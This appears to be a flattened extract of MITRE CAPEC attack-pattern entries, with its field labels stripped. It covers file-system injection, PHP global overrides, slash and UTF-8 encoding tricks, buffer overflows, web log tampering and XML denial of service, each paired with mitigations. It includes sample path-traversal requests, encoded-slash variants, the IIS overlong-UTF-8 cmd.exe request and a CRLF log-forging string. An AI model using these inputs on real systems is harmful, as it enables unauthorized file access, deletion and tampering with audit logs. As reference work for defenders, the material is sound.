The attacker injects context-appropriate malicious file system control syntax in order to manipulate the meta-data of the targeted file.
env-All
The software performs an action the attacker desires. This might be displaying information, storing information in a file, delete a file or some other malicious activity.
Use a system that logs file modification and/or access.
Make the application run in a low-privileged mode to prevent such attack to access important files.
Program must allow for user controlled variables to be applied directly to the filesystem
Very High
High
Injection
API Abuse
Modification of Resources
An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request
http://example/../../../../../etc/passwd
From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.
Low
To identify file system entry point and execute against an over-privileged system interface
Design: Enforce principle of least privilege.
Design: Ensure all input is validated, and does not contain file system commands
Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.
Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication.
Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Integrity
Modify application data
Payload delivered through standard communication protocols and inputs.
File system commands and specifiers
File system
File access or modification.
23
Targeted
22
Targeted
73
Targeted
77
Targeted
346
Targeted
348
Targeted
285
Secondary
264
Secondary
272
Targeted
59
Targeted
74
Targeted
15
Targeted
715
Targeted
1000
Attack Pattern
ChildOf
13
1000
Attack Pattern
ChildOf
137
1000
Attack Pattern
ChildOf
171
Exploitation
High
High
Medium
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.
The attacker communicates with the application server using a thin client (browser) or thick client.
While communicating with the server, the attacker finds that she can control and override a variable consumed by the application server.
The attacker overrides the variable and influences the normal behavior of the application server.
A variable consumed by the application server is exposed to the client.
A variable consumed by the application server can be overwritten by the user.
The application server trusts user supplied data to compute business logic.
The application server does not perform proper input validation.
Very High
Very High
Injection
Attack Example: PHP Global Variables
PHP is a study in bad security. The main idea pervading PHP is "ease of use," and the mantra "don't make the developer go to any extra work to get stuff done" applies in all cases. This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP.
One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user.
Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things:
while($count < 10){
// Do something
$count++;
}
Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as
GET /login.php?count=9
and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.
Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. If an attacker can supply a new $PATH variable (such as PATH='/var'), the program may be exploitable.
PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example.
Consider another example of this problem in which a program defines a variable called $tempfile. An attacker can supply a new temp file such as $tempfile = "/etc/passwd". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs.
Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be "Trojaned" (the attacker can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.
Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow.
File upload allows arbitrary file read by setting hidden form variables to match internal variable names (CVE-2000-0860)
Low
The malicious user can easily try some well-known global variables and find one which matches.
Medium
The attacker can use automated tools to probe for variables that she can control.
The attacker can try to change the value of the variables that are exposed on the webpage's source code and send them back to the application server. Depending on what program is running on the application server, the attacker may know which variables should be targeted.
The malicious user may try to guess a global variable just by black box testing at the request level. For instance it is possible to create a variable and assign it a value, then pass it along to the request made to the server.
Web penetration tool can be used to automate the discovery of client controlled global variables.
A web penetration tool probing a web server may generate abnormal activities recorded on log files. Abnormal traffic such as a high number of request coming from the same client may also rise the warnings from a monitoring system or an intrusion detection tool.
Do not allow override of global variables and do Not Trust Global Variables.
If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables.
A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary.
Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.
Use encapsulation when declaring your variables. This is to lower the exposure of your variables.
Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should be rejected by the program.
Integrity
Modify application data
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
The user controlled variable.
The new value of the user controlled variable.
The command or request interpreter on the server side is responsible for interpreting the global variables. Sometime the global variables are controlled by a setting. For instance in PHP, the Boolean setting "register_globals" defines whether or not to register the EGPCS (Environment, GET, POST, Cookie, Server) variables as global variables. As of PHP 4.2.0, this settings defaults to off. This directive was removed in PHP 6.0.0.
Changing the value of a server side variable may have many outcomes. In the case of a DEBUG related variable, there will be an information leak problem. Some other impacts can be privilege escalation, data modification, etc. It really depends on what the variable controls. If a global variable is used for authentication, there may be a vulnerability of privilege escalation. Another common variation of this last problem is to implement a "Remember My Login" feature by storing a user identifier in a cookie, allowing users to change their cookie value to login as whomever they want.
473
Targeted
15
Targeted
285
Secondary
302
Targeted
94
Secondary
96
Secondary
1000
Attack Pattern
ChildOf
22
1000
Attack Pattern
ChildOf
265
Global variables used on the server side should not be trusted.
Override of Global variables should not be allowed.
Exploitation
High
High
Medium
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Artur Maj
Securing PHP: Step-by-Step
Security Focus
June 22, 2003
http://www.securityfocus.com/infocus/1706
Clancy Malcolm
Ten Security Checks for PHP, Part 1
2003-03-20
PHP Manual
Chapter 29. Using Register Globals
The PHP Group
http://www.php.net/manual/en/security.globals.php
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets the use of the backslash in alternate encoding. An attacker can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the attacker tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.
The attacker can send input data to the host target (e.g., via http request or command line request
The attacker craft malicious input data which includes escaped slashes. The attacker may need multiple attempts before finding a successful combination.
The application accepts the backlash character as escape character.
The application server does incomplete input data decoding, filtering and validation.
High
High
Injection
Protocol Manipulation
API Abuse
For example, the byte pair \0 might result in a single zero byte (a NULL) being sent. Another example is \t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:
/ yields /
\/ yields /
Attack Example: Escaped Slashes in Alternate Encodings
An attack leveraging this pattern is very simple. If you believe the target may be filtering the slash, attempt to supply \/ and see what happens. Example command strings to try out include
CWD ..\/..\/..\/..\/winnt
which converts in many cases to
CWD ../../../../winnt
To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet
int main(int argc, char* argv[])
{
puts("\/ \\ \? \. \| ");
return 0;
}
produces the output
/ \ ? . |
Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:
CWD ..\?\?\?\?\/..\/..\/..\/winnt
CWD \.\.\/\.\.\/\.\.\/\.\.\/winnt
CWD ..\|\|\|\|\/..\/..\/..\/winnt
Low
The attacker can naively try backslash character and discover that the target host uses it as escape character.
Medium
The attacker may need deep understanding of the host target in order to exploit the vulnerability. The attacker may also use automated tools to probe for this vulnerability.
An attacker can manually inject backslash characters in the data sent to the target host and observe the results of the request.
The attacker may also run scripts or automated tools against the target host to uncover a vulnerability related to the use of the backslash character.
An attacker can use a fuzzer in order to probe for this vulnerability. The fuzzer should generate suspicious network activity noticeable by an intrusion detection system.
Alternative method of data encoding can be used.
Verify that the user-supplied data does not use backslash character to escape malicious characters.
Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system.
Be aware of the threat of alternative method of data encoding.
Regular expressions can be used to filter out backslash. Make sure you decode before filtering and validating the untrusted input data.
In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access.
Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.
Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names.
Confidentiality
Read application data
Read files or directories
Availability
DoS: resource consumption (memory)
Denial of Service
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
The user supplied data (e.g., HTTP request)
The backslash character injected in the user supplied data. The backslash character can be obfuscated with alternate encoding.
The command or request interpreter used on the host target may consider the backslash character as escape character.
The character following the backslash character will be escaped (i.e., unfiltered) and may cause harmful effects.
180
Targeted
181
Targeted
173
Targeted
171
Targeted
172
Targeted
73
Targeted
21
Targeted
22
Targeted
74
Targeted
20
Targeted
697
Targeted
707
Targeted
1000
Attack Pattern
PeerOf
64
1000
Attack Pattern
ChildOf
79
1000
Attack Pattern
PeerOf
71
1000
Attack Pattern
PeerOf
43
1000
Attack Pattern
ChildOf
267
1000
Attack Pattern
ChildOf
126
All client-supplied input must be validated through filtering and all output must be properly escaped.
Reluctance to Trust
Never trust user-supplied input.
Penetration
Exploitation
High
High
Medium
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets the encoding of the Slash characters. An attacker would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the attacker many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.
The attacker has access to a resource path and required to use slashes as resource delimiter.
The attacker tries variation and combination of the slashes characters in different encoding format.
The attacker found an unfiltered combination which maps to a valid path and accesses unauthorized resources (directories, files, etc.)
The application server accepts paths to locate resources.
The application server does insufficient input data validation on the resource path requested by the user.
The access right to resources are not set properly.
High
High
Injection
Protocol Manipulation
API Abuse
Attack Example: Slashes in Alternate Encodings
The two following requests are equivalent on most Web servers:
http://target server/some_directory\..\..\..\winnt
is equivalent to
http://target server/some_directory/../../../winnt
Multiple encoding conversion problems can also be leveraged as various slashes are instantiated in URL-encoded, UTF-8, or Unicode. Consider the strings
http://target server/some_directory\..%5C..%5C..\winnt
where %5C is equivalent to the \ character.
Low
An attacker can try variation of the slashes characters.
Medium
An attacker can use more sophisticated tool or script to scan a website and find a path filtering problem.
An attacker can try different encoding formats for the slashes characters and see if they produce the same filtering results.
Automated tools such as fuzzer can be used to test the URL decoding and filtering. Custom scripts can also be used. For example, a good script for verifying the correct interpretation of UTF-8 encoded characters can be found at http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
If the first path decoding process has left some invalid or blacklisted characters, that may be a sign that the request is malicious.
Traffic filtering with IDS (or proxy) can detect request with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks.
An attacker can use a fuzzer in order to probe for a UTF-8 encoding vulnerability. The fuzzer should generate suspicious network activity.
Typically the obfuscation here is the use of different alternate encoding format (UTF-8, Unicode, etc,)
Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Refer to the RFCs to safely decode URL.
When client input is required from web-based forms, avoid using the "GET" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the "POST method whenever possible.
There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)
Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)
Test your path decoding process against malicious input.
In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access.
Assume all input is malicious. Create a white list that defines all valid input to the application based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system.
Confidentiality
Read application data
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
The injection vector is a string path such as URL path.
The injection vector is a string path with malicious slashes characters. Alternate encoding format can also be used to code the slashes characters.
The impact of the payload is access to unauthorized resources.
173
Targeted
171
Targeted
180
Targeted
181
Targeted
20
Targeted
74
Targeted
73
Targeted
21
Targeted
22
Targeted
185
Secondary
200
Secondary
697
Targeted
707
Targeted
1000
Attack Pattern
PeerOf
71
1000
Attack Pattern
PeerOf
43
1000
Attack Pattern
ChildOf
267
1000
Attack Pattern
ChildOf
126
Least privilege
Reluctance to trust
Penetration
Exploitation
High
High
Medium
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Markus Kuhn
UTF-8 and Unicode FAQ for Unix/Linux
June 4, 1999
http://www.cl.cam.ac.uk/~mgk25/unicode.html
Gunter Ollmann
URL Encoded Attacks - Attacks using the common web browser
CGISecurity.com
http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An attacker who has access to an API may try to embed malicious code in the API function call and exploit a buffer overflow vulnerability in the function's implementation. All clients that make use of the code library thus become vulnerable by association. This has a very broad effect on security across a system, usually affecting more than one software process.
An attacker can call an API exposed by the target host.
On the probing stage, the attacker injects malicious code using the API call and observes the results. The attacker's goal is to uncover a buffer overflow vulnerability.
The attacker finds a buffer overflow vulnerability, crafts malicious code and injects it through an API call. The attacker can at worst execute remote code on the target host.
The target host exposes an API to the user.
One or more API functions exposed by the target host has a buffer overflow vulnerability.
High
High
API Abuse
Injection
Attack Example: Libc in FreeBSD
A buffer overflow in the FreeBSD utility setlocale (found in the libc module) puts many programs at risk all at once.
Xtlib
A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges.
Low
An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.
High
Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.
Use a language or compiler that performs automatic bounds checking.
Use secure functions not vulnerable to buffer overflow.
If you have to use dangerous functions, make sure that you do boundary checking.
Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.
Use OS-level preventative functionality. Not a complete solution.
Availability
DoS: crash / exit / restart
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read memory
Integrity
Modify memory
The user supplied data.
The buffer overrun by the attacker.
When the function returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to a malicious code.
The most common is remote code execution.
120
Targeted
119
Targeted
118
Targeted
74
Targeted
20
Targeted
680
Targeted
733
Secondary
697
Targeted
1000
Attack Pattern
ChildOf
100
Bound checking should be performed when copying data to a buffer.
Reluctance to trust
Defense in Depth
Penetration
High
High
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-119: Buffer Errors
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/119.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the "shortest possible" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.
Survey the application for user-controllable inputs
Using a browser or an automated tool, an attacker follows all public links and actions on a web site. He records all the links, the forms, the resources accessed and all other potential entry-points for the web application.
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
env-Web
Inputs are used by the application or the browser (DOM)
env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web
No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker.
A list of application user interface entry fields is created by the attacker.
A list of resources accessed by the application is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Probe entry points to locate vulnerabilities
The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.
Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines.
env-Web
Try to use UTF-8 encoding of content in HTML in order to bypass validation routines.
env-Web
Try to use UTF-8 encoding of content in CSS in order to bypass validation routines.
env-Web
The application accepts user-controllable input.
env-Web
The attacker's UTF-8 encoded payload is processed and acted on by the application without filtering or transcoding
The application decodes the charset and filters the inputs.
Implement input validation routines that filter or transcode for UTF-8 content.
Specify the charset of the HTTP transaction/content.
Monitor inputs to web servers. Alert on unusual charset and/or characters.
Actively monitor the application and either deny or redirect requests from origins that appear to be attack attempts.
The application's UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.
Input filtering and validating is not done properly leaving the door open to harmful characters for the target host.
High
High
Injection
Protocol Manipulation
API Abuse
Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this
http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe
the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.
So when the attacker requested the tainted URL, he accessed
http://servername/scripts/../../winnt/system32/cmd.exe
In other words, he walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where he could pass commands to the command shell, Cmd.exe.
CVE-2000-0884
Low
An attacker can inject different representation of a filtered character in UTF-8 format.
Medium
An attacker may craft subtle encoding of input data by using the knowledge that she has gathered about the target host.
Attacker may try to inject dangerous characters using UTF-8 different representation using (example of invalid UTF-8 characters). The attacker hopes that the targeted system does poor input filtering for all the different possible representations of the malicious characters. Malicious inputs can be sent through an HTML form or directly encoded in the URL.
The attacker can use scripts or automated tools to probe for poor input filtering.
A web page that contains overly long UTF-8 codes constitute a protocol anomaly, and could be an indication that an attacker is attempting to exploit a vulnerability on the target host.
An attacker can use a fuzzer in order to probe for a UTF-8 encoding vulnerability. The fuzzer should generate suspicious network activity noticeable by an intrusion detection system.
An IDS filtering network traffic may be able to detect illegal UTF-8 characters.
According to OWASP, sometimes cross-site scripting attackers attempt to hide their attacks in Unicode encoding.
The Unicode Consortium recognized multiple representations to be a problem and has revised the Unicode Standard to make multiple representations of the same code point with UTF-8 illegal. The UTF-8 Corrigendum lists the newly restricted UTF-8 range (See references). Many current applications may not have been revised to follow this rule. Verify that your application conform to the latest UTF-8 encoding specification. Pay extra attention to the filtering of illegal characters.
The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:
1. Insert a replacement character (e.g. '?', '').
2. Ignore the bytes.
3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).
4. Not notice and decode as if the bytes were some similar bit of UTF-8.
5. Stop decoding and report an error (possibly giving the caller the option to continue).
It is possible for a decoder to behave in different ways for different types of invalid input.
RFC 3629 only requires that UTF-8 decoders must not decode "overlong sequences" (where a character is encoded in more bytes than needed but still adheres to the forms above). The Unicode Standard requires a Unicode-compliant decoder to "...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence."
Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft's IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.
To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.
Another consideration is error recovery. To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position.
For security reasons, a UTF-8 decoder must not accept UTF-8 sequences that are longer than necessary to encode a character. If you use a parser to decode the UTF-8 encoding, make sure that parser filter the invalid UTF-8 characters (invalid forms or overlong forms).
Look for overlong UTF-8 sequences starting with malicious pattern. You can also use a UTF-8 decoder stress test to test your UTF-8 parser (See Markus Kuhn's UTF-8 and Unicode FAQ in reference section)
Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input.
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Integrity
Modify memory
Availability
Unexpected State
The injection vector is an illegal sequences of bytes matching an UTF-8 characters or a "non-shortest form" in UTF-8 encoding format.
The interpretation of malicious characters can cause unexpected responses from the target host.
The request or command interpreter is responsible for interpreting the request sent by the client.
The malicious characters can defeat the data filtering mechanism and have many different outcomes such as path manipulation, remote code execution, etc.
173
Targeted
172
Targeted
180
Targeted
181
Targeted
171
Secondary
73
Targeted
21
Targeted
74
Secondary
20
Secondary
697
Targeted
692
Targeted
1000
Attack Pattern
PeerOf
64
1000
Attack Pattern
PeerOf
71
1000
Attack Pattern
ChildOf
267
Reluctance to Trust
RFC 3629 - http://www.faqs.org/rfcs/rfc3629.html
Penetration
High
High
Medium
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
David Wheeler
Secure Programming for Linux and Unix HOWTO
5.9. Character Encoding
http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html
Michael Howard
David LeBlanc
Writing Secure Code
Chapter 12
Microsoft Press
Bruce Schneier
Crypto-Gram Newsletter
2000-07-15
http://www.schneier.com/crypto-gram-0007.html
Wikipedia
UTF-8
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/UTF-8
F. Yergeau
RFC 3629 - UTF-8, a transformation format of ISO 10646
November 2003
http://www.faqs.org/rfcs/rfc3629.html
Eric Hacker
IDS Evasion with Unicode
January 3, 2001
http://www.securityfocus.com/infocus/1232
Corrigendum #1: UTF-8 Shortest Form
The Unicode Standard
Unicode, Inc.
March 2001
http://www.unicode.org/versions/corrigendum1.html
Markus Kuhn
UTF-8 and Unicode FAQ for Unix/Linux
June 4, 1999
http://www.cl.cam.ac.uk/~mgk25/unicode.html
Markus Kuhn
UTF-8 decoder capability and stress test
February 19, 2003
http://www.cl.cam.ac.uk/%7Emgk25/ucs/examples/UTF-8-test.txt
CAPEC Content Team
The MITRE Corporation
2014-06-23
Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.
Determine Application Web Server Log File Format
The attacker observes the system and looks for indicators of which logging utility is being used by the web server.
Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.
env-Web
Attacker determines log file format used by application web server.
Attacker cannot conclusively determine log file format; he/she can only guess what the format is.
Determine Injectable Content
The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.
Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.
env-Web
Attacker observes content successfully injected into web logs.
Attacker lacks capability to observe if content was successfully injected into web logs.
Manipulate Log Files
The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.
Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.
For example: The HTTP request for "/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] "GET /forged-path HTTP/1.1" 200 - "-" USER_AGENT" may add the log line into Apache "access_log" (for example). Different applications may require different encodings of the carriage return and line feed characters.
env-Web
Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.
For example: The HTTP request for "/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] "GET /forged-path HTTP/1.1" 200 - "-" USER_AGENT" may add the log line into Apache "access_log" (for example). Different applications may require different encodings of the carriage return and line feed characters.
env-Web
Directly through log file or database manipulation, modify existing log entries.
env-Web
Forged entry or other malicious data inserted into application's logs.
No entry inserted into logs, or the entry is visibly distinguishable from real entries.
Input validation to ensure that only legal characters supplied by users can be entered into log files
Encode information from user such that any unexpected characters are encoded safely before they are entered into log files.
Post-processing of log files to remove or encode dangerous characters before displaying to a user may help in some cases. It will not help remove fake log entries entered using carriage return and line feed characters, however.
Target server software must be a HTTP server that performs web logging.
High
Medium
Modification of Resources
Time and State
Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network.
Low
To input faked entries into Web logs
Ability to send specially formatted HTTP request to web server
Design: Use input validation before writing to web log
Design: Validate all log data before it is output
Integrity
Modify application data
Forged log entry delivered through HTTP Request.
HTTP request
Web log, log reporting systems
Log data contains data designed to trick administrators and auditors as to chain of events. Limit ability to conduct forensics and other investigations/responses.
117
Targeted
93
Targeted
92
Targeted
221
Targeted
96
Secondary
20
Secondary
150
Secondary
276
Targeted
279
Secondary
116
Secondary
713
Targeted
1000
Attack Pattern
ChildOf
268
Obfuscation
Medium
High
Medium
Client-Server
SOA
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
XML Denial of Service (XDoS) can be applied to any technology that utilizes XML data. This is, of course, most distributed systems technology including Java, .Net, databases, and so on. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets.
There are three primary attack vectors that XDoS can navigate
Target CPU through recursion: attacker creates a recursive payload and sends to service provider
Target memory through jumbo payloads: service provider uses DOM to parse XML. DOM creates in memory representation of XML document, but when document is very large (for example, north of 1 Gb) service provider host may exhaust memory trying to build memory objects.
XML Ping of death: attack service provider with numerous small files that clog the system.
All of the above attacks exploit the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.
